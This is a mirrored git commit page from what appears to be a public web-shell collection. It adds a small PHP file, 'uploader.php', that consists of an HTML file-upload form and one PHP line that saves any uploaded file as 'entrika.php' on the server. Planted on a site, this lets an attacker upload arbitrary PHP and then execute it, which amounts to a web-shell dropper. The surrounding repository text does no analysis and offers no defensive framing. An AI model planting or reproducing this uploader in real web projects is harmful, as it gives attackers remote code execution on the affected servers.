mirror of
https://github.com/tennc/webshell.git
synced 2025-12-09 06:01:29 +00:00
reupdate xakepshell
This commit is contained in:
9
xakep-shells/PHP/uploader.php.php.txt
Normal file
9
xakep-shells/PHP/uploader.php.php.txt
Normal file
@@ -0,0 +1,9 @@
|
||||
<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
|
||||
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
|
||||
Send this file: <INPUT NAME="userfile" TYPE="file">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<?
|
||||
move_uploaded_file($userfile, "entrika.php");
|
||||
?>
|
||||
|
||||
Reference in New Issue
Block a user